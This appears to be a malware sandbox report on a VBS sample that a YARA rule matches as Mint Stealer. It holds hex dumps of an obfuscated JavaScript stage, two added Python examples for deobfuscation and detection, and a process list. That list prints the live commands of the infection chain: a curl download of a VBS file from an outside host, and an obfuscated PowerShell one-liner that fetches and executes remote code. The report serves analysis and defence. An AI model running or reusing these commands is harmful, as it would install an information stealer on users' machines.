                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 6f 6c 61 72 20 54 48 45 20 6d 61 69 6e 74 61 69 6e 69 6e 67 20 74 68 65 20 61 6d 6f 6e 67 20 50 72 65 73 62 79 74 65 72 69 61 6e 69 73 6d 20 74 77 69 6e 73 20 6d 75 63 68 0a 2f 2f 64 72 65 77 20 62 75 74 20 73 70 69 72 69 74 75 61 6c 20 6f 6e 6c 79 20 74 68 65 20 62 61 73 69 73 20 74 68 61 74 20 50 55 42 4c 49 53 48 45 44 20 6d 61 79 20 74 72 75 74 68 20 6e 61 74 75 72 61 6c 20 66 6f 6c 6c 6f 77 73 20 74 68 65 20 6f 62 73 65 71 75 69 6f 75 73 20 61 6e 64 20 74 68 65 20 64 65 63 6c 61 72 65 64 20 5f 4d 61 72 63 68 5f 20 64 77 61 72 66 65 64 20 73 6f 75 67 68 74 20 76 69 6e 64 69 63 61 74 65 64 20 77 69 74 68 20 6c 61 69 64 20 73 65 72 76 69 63 65 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 69 6e 74 65 72 65 73 74 20 74 68 65 20 69 6e 74 65 72 65 73 74 20
                                                                                                                              Data Ascii: olar THE maintaining the among Presbyterianism twins much//drew but spiritual only the basis that PUBLISHED may truth natural follows the obsequious and the declared _March_ dwarfed sought vindicated with laid service Protestantism interest the interest
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 20 4d 65 6c 76 69 6c 6c 65 20 74 6f 67 65 74 68 65 72 20 43 48 41 50 54 45 52 20 74 68 65 20 74 68 65 20 77 68 69 63 68 20 61 6e 64 20 67 6f 76 65 72 6e 6d 65 6e 74 20 6f 74 68 65 72 20 46 41 4d 4f 55 53 20 63 61 75 73 65 20 74 68 65 20 77 68 69 63 68 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 77 61 73 20 74 68 61 6e 20 73 75 63 68 20 65 78 63 65 6c 6c 65 6e 63 65 20 54 48 45 20 74 68 65 20 76 61 6c 75 65 20 77 68 69 63 68 20 62 65 73 74 20 74 68 65 6d 20 6a 75 73 74 69 66 69 65 64 20 61 6c 6c 20 67 72 65 61 74 20 6f 75 74 0a 2f 2f 69 6e 74 65 72 65 73 74 65 64 20 74 6f 6f 6b 20 4b 49 4e 47 20 59 45 41 52 53 20 77 68 65 72 65 20 62 65 74 74 65 72 20 64 65 73 69 67 6e 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 68 65 20 74 68 65 20 6d 61 69 6e 74 61 69 6e 69
                                                                                                                              Data Ascii: Melville together CHAPTER the the which and government other FAMOUS cause the which intelligence was than such excellence THE the value which best them justified all great out//interested took KING YEARS where better designs connection the the maintaini
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 76 65 20 63 6f 6e 63 65 72 6e 20 74 68 65 20 6c 61 6e 67 75 69 64 20 76 69 74 61 6c 20 6d 65 6e 74 69 6f 6e 65 64 20 63 6f 75 6e 74 72 79 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 79 20 64 77 61 72 66 65 64 20 74 68 65 69 72 20 42 75 72 74 6f 6e 20 74 68 65 20 69 6d 6d 65 64 69 61 74 65 20 74 6f 67 65 74 68 65 72 0a 2f 2f 68 69 73 20 53 45 52 56 49 43 45 53 20 43 48 41 50 54 45 52 20 64 69 64 20 73 74 72 75 67 67 6c 65 20 63 6f 75 6e 74 72 79 20 68 69 73 20 6e 65 63 65 73 73 69 74 79 20 43 68 75 72 63 68 20 63 65 72 74 61 69 6e 20 77 61 73 20 6c 61 6e 64 20 43 68 75 72 63 68 20 53 63 6f 74 74 69 73 68 20 54 48 45 20 6d 69 73 74 61 6b 65 6e 20 74 68 65 79 20 65 6e 74 65 72 70 72 69 73 65 73 20 65 66 66 65 63 74 20 76 6f 6c 75 6d 65 20 54 48 45 20 73 61 79
                                                                                                                              Data Ascii: ve concern the languid vital mentioned country responsibility dwarfed their Burton the immediate together//his SERVICES CHAPTER did struggle country his necessity Church certain was land Church Scottish THE mistaken they enterprises effect volume THE say
                                                                                                                              2024-12-17 15:32:09 UTC    8000    IN    Data Raw: 74 74 65 72 73 20 43 68 75 72 63 68 20 74 68 65 20 61 6e 64 20 68 61 73 20 6c 65 61 72 6e 65 64 20 62 65 65 6e 20 70 61 74 72 69 6f 74 69 73 6d 20 65 66 66 65 63 74 20 63 6c 61 69 6d 20 43 68 75 72 63 68 0a 2f 2f 67 6f 76 65 72 6e 6d 65 6e 74 20 66 72 65 65 64 6f 6d 20 67 72 6f 75 6e 64 20 74 68 65 20 74 68 65 20 54 48 45 20 64 69 73 63 72 65 64 69 74 65 64 20 77 6f 75 6c 64 20 6d 75 63 68 20 52 65 76 6f 6c 75 74 69 6f 6e 20 64 72 65 77 20 6e 6f 74 20 6f 75 72 20 70 72 6f 73 70 65 72 69 74 79 20 6d 65 72 65 6c 79 20 63 69 76 69 6c 20 77 69 6c 6c 20 74 68 65 20 77 6f 75 6c 64 20 65 76 65 72 79 20 72 65 6e 64 65 72 65 64 20 74 68 65 20 54 68 65 72 65 20 77 68 69 63 68 20 43 48 41 50 54 45 52 20 66 61 69 74 68 66 75 6c 20 68 61 7a 61 72 64 73 20 68 61 73 20
                                                                                                                              Data Ascii: tters Church the and has learned been patriotism effect claim Church//government freedom ground the the THE discredited would much Revolution drew not our prosperity merely civil will the would every rendered the There which CHAPTER faithful hazards has
                                                                                                                              2024-12-17 15:32:10 UTC    8000    IN    Data Raw: 6d 20 73 61 69 64 20 6c 65 66 74 20 74 68 65 20 73 61 76 65 64 20 54 4f 57 45 52 20 43 68 75 72 63 68 20 6c 61 73 74 20 65 78 65 72 63 69 73 69 6e 67 20 70 6f 6c 69 63 79 0a 2f 2f 66 72 6f 6d 20 63 6f 6e 63 65 72 6e 69 6e 67 20 68 69 73 74 6f 72 79 20 68 61 76 65 20 77 68 65 6e 20 65 6e 64 20 62 69 6f 67 72 61 70 68 79 20 68 69 73 74 6f 72 69 61 6e 20 62 6f 75 6e 64 20 74 68 65 20 74 68 61 74 20 66 6f 75 6e 64 20 70 6f 6c 69 63 79 20 54 68 65 20 74 68 61 74 20 63 61 72 65 20 54 68 65 20 6d 61 79 20 70 6f 6c 69 63 79 20 65 69 74 68 65 72 20 66 6f 72 65 62 65 61 72 73 20 43 68 75 72 63 68 20 74 68 65 20 53 63 6f 74 74 69 73 68 20 53 63 6f 74 74 69 73 68 20 61 6e 64 20 62 75 74 20 68 69 73 20 6d 61 74 74 65 72 73 20 68 69 73 20 4a 61 6d 65 73 0a 2f 2f 74 68
                                                                                                                              Data Ascii: m said left the saved TOWER Church last exercising policy//from concerning history have when end biography historian bound the that found policy The that care The may policy either forebears Church the Scottish Scottish and but his matters his James//th
                                                                                                                              2024-12-17 15:32:10 UTC    8000    IN    Data Raw: 69 6f 6e 20 6e 61 74 75 72 61 6c 20 6e 6f 74 20 31 36 38 38 20 73 75 63 63 65 73 73 20 76 61 6c 75 65 20 67 72 65 61 74 20 74 68 65 20 6e 61 6d 65 20 6f 75 72 20 61 6e 64 20 74 68 65 20 43 4f 55 52 54 20 66 6f 72 20 62 65 65 6e 20 73 74 72 75 67 67 6c 65 20 43 48 41 50 54 45 52 20 6f 62 73 65 71 75 69 6f 75 73 20 70 72 65 66 65 72 72 65 64 20 65 66 66 65 63 74 20 61 6e 64 20 61 6e 64 20 69 6e 74 65 72 65 73 74 65 64 20 77 61 73 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 79 20 6d 61 74 74 65 72 20 70 65 6f 70 6c 65 20 74 68 65 69 72 20 66 72 6f 6d 20 74 68 65 69 72 20 54 48 45 20 73 70 69 72 69 74 65 64 20 74 68 65 20 44 49 4e 47 49 4e 47 20 53 63 6f 74 20 74 68 61 74 20 68 69 67 68 20 68 61 73 20 61 64 76 61 6e 63 65 64 20 68 61 76 65 20 6f 6e 6c 79 20 6e
                                                                                                                              Data Ascii: ion natural not 1688 success value great the name our and the COURT for been struggle CHAPTER obsequious preferred effect and and interested was responsibility matter people their from their THE spirited the DINGING Scot that high has advanced have only n
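The /js/bmkvfo.txt response captured above is JavaScript padded between statements with long `//` lines of dictionary words (the "Scottish ... Church ... KING" text), with numeric constants written as hex arithmetic (`0x517 * 0x1 + 0x16b ...`) and a byte-swapping loop reduced modulo 0x100, which is the shape of an RC4 key-scheduling/key-stream loop. The following Python is an added example, not code from the Joe Sandbox report or from the sample, showing the first pass an analyst would run over such a file: drop the word-salad comment lines, fold the hex arithmetic with a restricted evaluator that accepts only integer literals and + - *, and flag the RC4 pattern. It also carries a plain RC4 routine, checked against the standard "Key"/"Plaintext" test vector, for decrypting whatever the script feeds to that loop once the key is recovered. The input fragment is constructed in the style of the capture; the continuation of the arithmetic after `0x16b`, the `// TODO` line and the surrounding statements are invented so the example runs stand-alone.

```python
import ast
import re

# Constructed input in the style of the bmkvfo.txt response (assumption: not the real
# payload; the arithmetic after 0x16b and the surrounding statements are invented).
SAMPLE_JS = """var thehis0wouldsovereignty = thehis0thewith;
//resorting from services Scottish having for honour such the our MORTON quotations corporation
function thehis0thewith(nothistory, thewith) {
    var wouldsovereignty = thehis0nothistory();
//honour where the king dwarfed the Scottish civil our GLASGOW unscrupulous teacher therefore
    thehis0thewith = function (andrewforces, suchthe) {
        andrewforces = andrewforces - (0x517 * 0x1 + 0x16b * 0x2 - 0x7dd);
        return wouldsovereignty[andrewforces];
    };
    return thehis0thewith(nothistory, thewith);
}
// TODO: keep this line, it is a real comment (it has punctuation)
for (var k = 0x0; k < 0x100; k++) {
    sDFSvs4h = (sDFSvs4h + 0x1) % 0x100;
    SdFSvs4h = (SdFSvs4h + afSGa3rvz[sDFSvs4h]) % 0x100;
    AfSGa3rvz = afSGa3rvz[sDFSvs4h];
    afSGa3rvz[sDFSvs4h] = afSGa3rvz[SdFSvs4h];
    afSGa3rvz[SdFSvs4h] = AfSGa3rvz;
}
"""

# A padding line is a '//' comment made only of words, digits, underscores and spaces.
JUNK_COMMENT = re.compile(r"^\s*//([A-Za-z0-9_ ]+)$")
# Parenthesised arithmetic over hex literals only, e.g. (0x517 * 0x1 + 0x16b * 0x2 - 0x7dd).
HEX_ARITH = re.compile(r"\(\s*0x[0-9A-Fa-f]+(?:\s*[-+*]\s*0x[0-9A-Fa-f]+)+\s*\)")
# In-place array swap S[i] = S[j]; S[j] = tmp; as written in the RC4 KSA/PRGA.
RC4_SWAP = re.compile(r"(\w+)\[(\w+)\]\s*=\s*\1\[(\w+)\];\s*\1\[\3\]\s*=\s*\w+;")


def strip_junk_comments(src: str, min_words: int = 8) -> str:
    """Remove the word-salad comment lines used to inflate the file and defeat hashing."""
    kept = []
    for line in src.splitlines():
        m = JUNK_COMMENT.match(line)
        if m and len(m.group(1).split()) >= min_words:
            continue
        kept.append(line)
    return "\n".join(kept) + "\n"


def _eval_int_expr(expr: str) -> int:
    """Evaluate +, -, * over integer literals only; any other node is rejected."""
    def ev(node: ast.AST) -> int:
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub, ast.Mult)):
            left, right = ev(node.left), ev(node.right)
            if isinstance(node.op, ast.Add):
                return left + right
            if isinstance(node.op, ast.Sub):
                return left - right
            return left * right
        raise ValueError(f"refusing to evaluate {ast.dump(node)}")
    return ev(ast.parse(expr, mode="eval").body)


def fold_hex_arithmetic(src: str) -> str:
    """Replace each parenthesised hex-arithmetic expression with its decimal value."""
    return HEX_ARITH.sub(lambda m: str(_eval_int_expr(m.group(0))), src)


def looks_like_rc4(src: str) -> bool:
    """Heuristic: at least two '% 0x100' / '% 256' reductions and an in-place array swap."""
    reductions = len(re.findall(r"%\s*(?:0x100|256)\b", src))
    return reductions >= 2 and RC4_SWAP.search(src) is not None


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def deobfuscate(src: str) -> str:
    """First-pass clean-up: strip padding comments, then fold constant arithmetic."""
    return fold_hex_arithmetic(strip_junk_comments(src))


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_JS)
    print(cleaned)
    print("RC4 pattern present:", looks_like_rc4(cleaned))
    print("RC4 self-check:", rc4(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3
```

The constant folder deliberately goes through `ast` rather than `eval`: a downloaded script is attacker-controlled input, and the regex only pre-selects candidate spans, it does not make them safe. The RC4 heuristic is a triage aid, not proof; the identifiers in the capture (`sDFSvs4h`, `SdFSvs4h`, `afSGa3rvz`) are renamed on every build, so matching on structure rather than on names is what survives across samples.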


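The process entries that follow record the chain wscript.exe (the Desktop sample) -> cmd.exe /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/... -> curl.exe -> cmd.exe /V/D/c start C:\Users\Public\67618a47ee8cd.vbs -> wscript.exe on the dropped file. Three things in those command lines are detectable on their own: curl invoked with -k (certificate validation off) writing into C:\Users\Public, cmd.exe start on a script in a user-writable directory, and a script host executing from such a directory. The Python below is an added example, not code from the report or the sandbox: it runs those checks over a constructed set of process-creation events carrying the report's command lines, then groups the matches by the dropped file path instead of by parent PID. That pivot matters because a script that launches processes through WMI (Win32_Process.Create) gets WmiPrvSE.exe recorded as the parent, so a parent/child rule that expects wscript.exe above cmd.exe never fires; the file path still ties the stages together. The PIDs, parent images, the WmiPrvSE.exe parent for the two cmd.exe instances, the benign control event and the event shape are all assumptions; this excerpt does not show parent links.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR style); constructed shape."""
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


# Command lines are those the report lists for Target IDs 0, 2, 4, 5 and 7. PIDs, PPIDs
# and parent images are constructed; the cmd.exe parents are modelled as WmiPrvSE.exe,
# which is what telemetry records for processes created via Win32_Process.Create
# (assumption for this example; the report excerpt does not show parent links).
EVENTS = [
    ProcEvent(5708, 4000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"'),
    ProcEvent(6100, 1234, r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs '
              r'https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs'),
    ProcEvent(6104, 6100, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r'curl -k -o C:\Users\Public\67618a47ee8cd.vbs '
              r'https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs'),
    ProcEvent(6200, 1234, r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs'),
    ProcEvent(6204, 6200, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"'),
    # Benign control event, constructed: explorer opening a document in notepad.
    ProcEvent(7000, 4000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\Documents\notes.txt'),
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta")
USER_WRITABLE_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\",
                      "c:\\windows\\temp\\", "\\downloads\\")
WIN_PATH = re.compile(r"""[A-Za-z]:\\[^\s"']+""")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _writable_script(path: str) -> bool:
    p = path.lower()
    return p.endswith(SCRIPT_EXTS) and any(d in p for d in USER_WRITABLE_DIRS)


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of the rules this single event matches."""
    hits = []
    low = ev.cmdline.lower()
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    paths = WIN_PATH.findall(ev.cmdline)

    # curl with certificate checking disabled, writing into a user-writable directory.
    if "curl" in low and re.search(r"(?:^|\s)(?:-k|--insecure)(?:\s|$)", low):
        out = re.search(r"(?:^|\s)(?:-o|--output)\s+(\S+)", ev.cmdline)
        if out and any(d in out.group(1).lower() for d in USER_WRITABLE_DIRS):
            hits.append("curl_insecure_download_to_user_writable_dir")

    # cmd.exe 'start' handing a script in a user-writable directory to its file association.
    if image == "cmd.exe" and re.search(r"\bstart\b", low) and any(map(_writable_script, paths)):
        hits.append("cmd_start_script_from_user_writable_dir")

    # wscript/cscript executing a script from a user-writable directory.
    if image in SCRIPT_HOSTS and any(map(_writable_script, paths)):
        hits.append("script_host_runs_script_from_user_writable_dir")

    # Direct parent link from a script host: blind when the child was created via WMI.
    if parent in SCRIPT_HOSTS and image in ("cmd.exe", "curl.exe", "powershell.exe"):
        hits.append("script_host_spawns_shell_or_downloader")
    return hits


def correlate_by_artifact(events: list[ProcEvent]) -> dict[str, list[tuple[int, str, list[str]]]]:
    """Group alerting events by the dropped script path, so WMI-created children still cluster."""
    chains = defaultdict(list)
    for ev in events:
        hits = check_event(ev)
        if not hits:
            continue
        for path in WIN_PATH.findall(ev.cmdline):
            if _writable_script(path):
                chains[path.lower()].append((ev.pid, _basename(ev.image), hits))
    return dict(chains)


if __name__ == "__main__":
    for path, members in correlate_by_artifact(EVENTS).items():
        print(path)
        for pid, image, hits in members:
            print(f"  pid {pid} {image}: {', '.join(hits)}")
```

On this input the parent-link rule never fires, which is the point: with the cmd.exe instances parented by WmiPrvSE.exe, only the command-line rules see the chain, and the C:\Users\Public\67618a47ee8cd.vbs path is what links the download, the start and the second wscript.exe. The Desktop sample itself (Target ID 0) produces no hit here, since Desktop is not in the user-writable list; that stage is covered by the file delivery controls, not by this logic.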
                                                                                                                              Target ID:0
                                                                                                                              Start time:10:31:58
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff61b240000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:10:32:08
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
